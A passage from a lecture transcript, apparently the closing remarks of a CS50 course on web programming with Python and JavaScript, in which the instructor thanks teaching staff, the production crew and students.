the course possible.
To David, my co-instructor, who
unfortunately couldn't be here today.
But also to our great teaching
fellows, Anushree and Elle and Rodrigo
and Sebastian and Jessica
for running the course's
office hours in the course's sections.
And of course, the CS50's
production team, Ramon and Andrew
and Max and Meredith and Ian
and Scully and Dan and Arturo
for making the lectures possible
and the lecture videos possible.
Thank you to you all.
And of course, finally, thank you to all
of you for joining us in this course,
for learning about web programming
with Python and JavaScript.
Hope you enjoyed it.
Hope you got an opportunity to
work on some hands-on projects that
were exciting and ultimately
showed you the power and capacity
that Python and JavaScript have for
building really dynamic and really
interesting web applications.
Can't wait to see what you guys
continue to do with your final projects.
But that's it for web programming
with Python and JavaScript,
so thank you all so much.
[APPLAUSE]
